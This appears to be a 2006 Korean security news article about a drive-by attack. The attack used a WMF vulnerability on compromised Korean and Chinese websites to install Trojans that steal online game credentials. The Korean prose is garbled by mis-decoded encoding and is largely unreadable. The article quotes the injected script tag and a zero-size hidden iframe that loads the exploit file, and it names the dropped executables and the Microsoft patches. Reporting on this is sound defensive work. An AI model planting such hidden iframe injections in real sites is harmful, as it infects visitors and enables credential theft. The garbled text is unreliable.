Home > Àüü±â»ç

WMF Ãë¾àÁ¡ ÀÌ¿ë »õ·Î¿î °ø°Ý ½Ãµµ ¹ß°ß

ÀÔ·Â : 2006-01-16 00:00
ÆäÀ̽ººÏ º¸³»±â Æ®À§ÅÍ º¸³»±â ³×À̹ö ¹êµå º¸³»±â īī¿À ½ºÅ丮 º¸³»±â ³×À̹ö ºí·Î±× º¸³»±â

¿Â¶óÀÎ °ÔÀÓ ¾ÆÀ̵ð¿Í ¾ÏÈ£ À¯Ã⠽õµ 


Áö¿ÀÆ® ¹ÙÀÌ·¯½º ºÐ¼®½Ç(GCERT www.geot.com)Àº GWHS(Geot Web Hacking Scan)ÀÚµ¿È­ ¸ð´ÏÅ͸µ ½Ã½ºÅÛÀ» ÅëÇØ 15ÀÏ ¿ÀÈÄ 7½Ã°æ ±¹³» À¯Çаü·Ã »çÀÌÆ®¿¡¼­ korea.wmf ÆÄÀÏÀ» À¯Æ÷ÁßÀÎ °ÍÀ» ¹ß°ßÇß´Ù°í 16ÀÏ ¹ßÇ¥Çß´Ù.


ÇØ´ç À¯Çаü·Ã »çÀÌÆ®¿¡ Á¢¼ÓÀ» ÇÏ°Ô µÇ¸é À妽º ÆÄÀÏ¿¡ Æ÷ÇÔµÈ ¾Æ·¡ÀÇ ÀÚ¹Ù½ºÅ©¸³Æ® Äڵ尡 ½ÇÇàµÈ´Ù.

<script type="text/javascript" src="search.js"></script>

search.js ¿¡ ÀÇÇØ¼­ ³»ºÎ¿¡ Æ÷ÇÔµÈ ¾ÆÀÌÇÁ·¹ÀÓÀÌ ÀÚµ¿À¸·Î ½ÇÇàµÈ´Ù.

<iframe src=img/korea.wmf widht=0 height=0></iframe>

korea.wmf ÆÄÀÏÀº º¸¾ÈÃë¾àÁ¡À» ÀÌ¿ëÇØ ÀÓ½ÃÆú´õ¿¡ korea.exe ¸¦ »ý¼ºÇÏ°í ½ÇÇàÇÑ´Ù. korea.exe ´Â ´Ù½Ã ½Ã½ºÅÛÆú´õ¿¡ a.exe ¸¦ »ý¼ºÇϰí, a.exe ´Â Explore.exe ¿Í plugin1.dat ÆÄÀÏÀ» »ý¼ºÇÑ´Ù.

 


À̿ܿ¡µµ Áö¿ÀÆ®´Â ³ó»ê¹° °ü·Ã Çѱ¹»çÀÌÆ® 1°÷, Áß±¹»çÀÌÆ® 2°÷¿¡¼­ wmf Ãë¾àÁ¡À» ÀÌ¿ëÇÑ Æ®·ÎÀ̸ñ¸¶°¡ À¯Æ÷ÁßÀÎ °Íµµ GWHS ¸ð´ÏÅ͸µ °úÁ¤¿¡¼­ ¹ß°ßµÆ°í Áö³­ ÁÖ¸»»çÀÌ¿¡´Â »õ·Î¿î ±¹»ê ¿Â¶óÀÎ °ÔÀÓÀÇ ¾ÆÀ̵ð¿Í ¾ÏÈ£¸¦ À¯Ãâ½Ãµµ ÇÏ´Â »õ·Î¿î Á¾·ùÀÇ Æ®·ÎÀ̸ñ¸¶°¡ À¯Æ÷µÈ °ÍÀÌ ¹ß°ßµÆ´Ù°í ¹àÇû´Ù.


±×µ¿¾È ±¹³» »çÀÌÆ®¸¦ ÇØÅ·ÇØ À¯Æ÷Çß´ø Æ®·ÎÀ̸ñ¸¶´Â ±¹»ê°ÔÀÓÀÇ »ç¿ëÀÚ Á¤º¸¸¦ À¯Ãâ½ÃµµÇÑÀûÀÌ ÀÖ°í 14ÀÏ¿¡´Â 2°÷, 15ÀÏ¿¡´Â 3°÷ÀÇ ±¹³» »çÀÌÆ®¿¡¼­ À¯Æ÷µÈ Sevad.exe(20,480 ¹ÙÀÌÆ®)¿Í noad.dll(25,600 ¹ÙÀÌÆ®) ÆÄÀÏÀº ±¹»ê ¿Â¶óÀÎ ·ÑÇ÷¹À× °ÔÀÓ¿¡¼­ »ç¿ëÀÚÀÇ Á¤º¸¸¦ À¯Ã⠽õµÇÏ´Â °ÍÀ¸·Î È®ÀÎµÆ´Ù°í ¹àÇû´Ù.


ÀÌó·³ ±¹³»ÀÇ À¯¸í ¿Â¶óÀÎ °ÔÀÓµéÀÇ °³ÀÎÁ¤º¸¸¦ µµ¿ëÇÒ·Á´Â ½Ãµµ°¡ Áö¼ÓÀûÀ¸·Î ¹ß°ßµÊ¿¡ µû¶ó °ÔÀÓ¾÷ü¿Í °ÔÀÓ»ç¿ëÀÚ, ÀÎÅÍ³Ý »ç¿ëÀÚµéÀÇ °¢º°ÇÑ ÁÖÀǰ¡ ÇÊ¿äÇϸç ÀÎÅÍ³Ý °ÔÀÓ»ç¿ëÀÚ°¡ ¾Æ´ÒÁö¶óµµ ÀÌ·¯ÇÑ Æ®·ÎÀ̸ñ¸¶¿¡ °¨¿°µÉ °æ¿ì ÀÎÅÍ³Ý ¼Óµµ°¡ ÇöÀúÈ÷ ´À·ÁÁö°Å³ª ÀÀ¿ëÇÁ·Î±×·¥ ¿À·ùµîÀÇ ºÎÀÛ¿ëÀÌ ¹ß»ýÇÒ ¼ö ÀÖ´Ù°í ¹àÇû´Ù. 


À§ÀÇ º¸¾ÈÃë¾àÁ¡À» À§ÇØ ÃÖ½ÅÀÇ ¹é½ÅÇÁ·Î±×·¥°ú ÀÎÅÍ³Ý ÀͽºÇ÷η¯¸¦ »ç¿ëÇϸç, ¾Æ·¡ÀÇ º¸¾ÈÆÐÄ¡´Â ¹Ýµå½Ã ¼³Ä¡ÇØ¾ß ÇÑ´Ù.

www.microsoft.com/korea/technet/security/bulletin/MS04-013.asp

www.microsoft.com/korea/technet/security/bulletin/MS05-001.msp


Áö¿ÀÆ® °ü°èÀÚ´Â ¡°ÀÌ·¯ÇÑ ¸ñÀûÀ» °¡Áø ÇàÀ§°¡ ÇØÅ·À¸·Î ¿¬°áµÇ¾î ±¹³»ÀÇ ¸¹Àº À¥»çÀÌÆ®°¡ ÇØÅ·ÀÇ À§Çè¿¡ ³ëÃâµÇ°í ÀÖ´Ù¡±¸ç ¡°ÀÌó·³ ¸¹Àº »çÀÌÆ®µéÀÌ À¥»çÀÌÆ® º¯Á¶ÇÇÇØ·Î ÀÎÇÏ¿©, ºÒƯÁ¤´Ù¼öÀÇ »çÀÌÆ® Á¢¼ÓÀڵ鿡°Ô ¾ÇÀÇÀûÀÎ Æ®·ÎÀ̸ñ¸¶ ÇÁ·Î±×·¥À» À¯Æ÷Çϰí ÀÖ¾î °¢º°ÇÑ ÁÖÀǰ¡ ¿ä¸ÁµÈ´Ù¡±°í ´çºÎÇß´Ù.

[±æ¹Î±Ç ±âÀÚ(is21@infothe.com)]


<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(www.boannews.com) ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö>

  •  
  • 0
  • ÆäÀ̽ººÏ º¸³»±â Æ®À§ÅÍ º¸³»±â ³×À̹ö ¹êµå º¸³»±â īī¿À ½ºÅ丮 º¸³»±â ³×À̹ö ºí·Î±× º¸³»±â

  • ¡°
  •  SNS¿¡¼­µµ º¸¾È´º½º¸¦ ¹Þ¾Æº¸¼¼¿ä!! 
  • ¡±
2025 º¸¾È½ÃÀå ¹é¼­ À§Áîµð¿£¿¡½º 2018
¼³¹®Á¶»ç
SKÅÚ·¹ÄÞ ÇØÅ· »çÅ·ΠÃÖ±Ù ÀÕ½´°¡ µÇ°í ÀÖ´Â ¡®BPFµµ¾î¡¯ °ü·Ã, ¾î¶² ¼Ö·ç¼ÇÀ» »ç¿ëÁßÀΰ¡¿ä?
¾È·¦ V3 Net for Linux
¼Ò¸¸»ç Server-i
ÆÄÀÌ¿À¸µÅ© Á¡°Ë µµ±¸
À×Ä«ÀÎÅÍ³Ý Àü¿ë ¹é½Å
Æ®·»µå ¸¶ÀÌÅ©·Î ¹é½Å
±âŸ ±¹»ê(¼Ö·ç¼Ç¸íÀº ´ñ±Û·Î)
±âŸ ¿Ü»ê(¼Ö·ç¼Ç¸íÀº ´ñ±Û·Î)
»ç¿ëÇÏÁö ¾Ê´Â´Ù